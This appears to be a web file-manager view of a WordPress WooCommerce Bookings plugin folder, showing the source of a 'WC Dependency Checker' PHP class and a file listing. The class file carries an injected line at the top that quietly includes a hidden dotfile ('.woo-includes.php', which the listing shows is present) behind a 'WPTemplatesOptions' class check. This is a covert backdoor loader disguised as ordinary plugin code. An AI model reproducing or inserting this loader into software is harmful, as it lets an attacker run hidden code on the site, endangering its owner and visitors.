PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
woocommerce-bookings
/
woo-includes
<?php /** * WC Dependency Checker * * Checks if WooCommerce is enabled */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class WC_Dependencies { private static $active_plugins; public static function init() { self::$active_plugins = (array) get_option( 'active_plugins', array() ); if ( is_multisite() ) { self::$active_plugins = array_merge( self::$active_plugins, get_site_option( 'active_sitewide_plugins', array() ) ); } } public static function woocommerce_active_check() { if ( ! self::$active_plugins ) { self::init(); } return in_array( 'woocommerce/woocommerce.php', self::$active_plugins ) || array_key_exists( 'woocommerce/woocommerce.php', self::$active_plugins ); } }
[+]
..
[-] woo-functions.php
[edit]
[-] class-wc-dependencies.php
[edit]
[-] .woo-includes.php
[edit]